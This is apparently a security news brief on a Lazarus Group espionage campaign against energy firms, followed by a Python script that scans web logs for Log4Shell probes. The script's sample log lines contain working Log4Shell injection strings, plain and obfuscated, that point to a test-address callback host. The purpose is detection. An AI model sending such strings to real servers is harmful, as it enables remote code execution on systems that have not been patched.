Threat Management, Critical Infrastructure Security

Lazarus APT cyberespionage campaign sets sights on energy firms worldwide

U.S., Canadian, and Japanese energy providers, along with energy firms in other countries, were targeted between February and July 2022 in a cyberespionage campaign attributed to the North Korean state-sponsored Lazarus Group, The Hacker News reports. According to a Cisco Talos report, the campaign was intended to establish long-term access to the compromised organizations and to exfiltrate data to North Korea. Whereas the similar intrusions that Symantec and AhnLab attributed in April and May to the Lazarus subgroup Stonefly, also known as Andariel, deployed the NukeSped and Preft implants, the newest campaign relied on three other tools: VSingle, bot malware capable of executing arbitrary code on the infected host; YamaBot, a Golang-based backdoor; and MagicRAT, a newly identified remote access trojan. Talos also found that Lazarus gained initial network access by exploiting Log4Shell and other vulnerabilities in VMware products, and that in one intrusion chain VSingle alone was used for reconnaissance, data exfiltration, and manual backdooring of the compromised host.
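The one initial-access detail the report gives, Log4Shell against internet-facing VMware products, is also the easiest part of this activity to hunt for retroactively in web server logs, because the exploit string has to reach the vulnerable Log4j logger in a request field. The scanner below is an added example written for this page; it is not Talos's code or a published indicator from the campaign. The log lines are constructed for the demonstration (Apache combined-log format, a made-up portal path, RFC 5737 test addresses), and the obfuscation handling covers only the common Log4j lookup tricks (`${lower:x}`, `${upper:x}`, `${...:-x}`), so it is a starting point for a hunt, not a complete parser of Log4j's substitution grammar.

```python
"""Hunt for Log4Shell (CVE-2021-44228) probe strings in web access logs.

Attackers routinely wrap the ${jndi:...} lookup in nested lookups such as
${${lower:j}ndi:...} or ${${env:NaN:-j}ndi:...} so that a naive substring
match for "${jndi:" misses them.  Log4j resolves the innermost lookups first,
so we do the same: repeatedly collapse the simple inner lookups, then match
the de-obfuscated string.
"""
import re
from typing import Dict, List

# Inner lookups that Log4j would resolve to plain text before the outer
# ${jndi:...} is evaluated.  Two forms handled here:
#   ${lower:X} / ${upper:X}      -> X lowercased / uppercased
#   ${anything:-X} and ${::-X}   -> the default value X
# [^${}]* keeps each match to the innermost, non-nested lookup.
_INNER = re.compile(
    r"\$\{(lower|upper):([^${}]*)\}"      # group 1: lower/upper, group 2: text
    r"|\$\{[^${}]*:-([^${}]*)\}",         # group 3: default value
    re.IGNORECASE,
)

# After normalization: ${jndi:<scheme>:[//]<target>}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):(?://)?([^}]*)", re.IGNORECASE)


def _resolve(m: "re.Match[str]") -> str:
    """Replace one inner lookup with the text Log4j would substitute."""
    if m.group(1) is not None:
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    return m.group(3)


def normalize(s: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups innermost-first until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per log line carrying a JNDI lookup, obfuscated or not."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        norm = normalize(line)
        m = _JNDI.search(norm)
        if not m:
            continue
        hits.append({
            "client": line.split(" ", 1)[0],      # first CLF field is the client IP
            "scheme": m.group(1).lower(),        # ldap, ldaps, rmi, dns, ...
            "target": m.group(2),                # attacker callback host/path
            "obfuscated": norm != line,          # True if nesting had to be unwrapped
            "line": line,
        })
    return hits


# Constructed sample log lines (not real traffic).  Line 1 is benign; the
# other three carry a plain, a case-obfuscated and a default-value-obfuscated
# JNDI lookup in the User-Agent or query string, both of which Log4j-backed
# applications commonly log.
SAMPLE_LOGS = [
    '10.0.0.5 - - [02/Mar/2022:10:14:01 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [02/Mar/2022:10:15:22 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/Exploit}"',
    '10.0.0.9 - - [02/Mar/2022:10:16:03 +0000] "GET /portal/info.jsp?x=${${lower:j}${upper:n}di:${::-l}dap://203.0.113.7:1389/a} HTTP/1.1" 200 512 "-" "curl/7.68"',
    '10.0.0.9 - - [02/Mar/2022:10:17:45 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:rmi://203.0.113.7:1099/obj}"',
]


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOGS):
        flag = "obfuscated" if hit["obfuscated"] else "plain"
        print(f'{hit["client"]} {hit["scheme"]}://{hit["target"]} ({flag})')
```

A hit is only evidence of a probe, not of compromise: follow up by checking whether the logging host made an outbound LDAP/RMI connection to the extracted target around the timestamp, since that callback is what turns the lookup into code execution.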
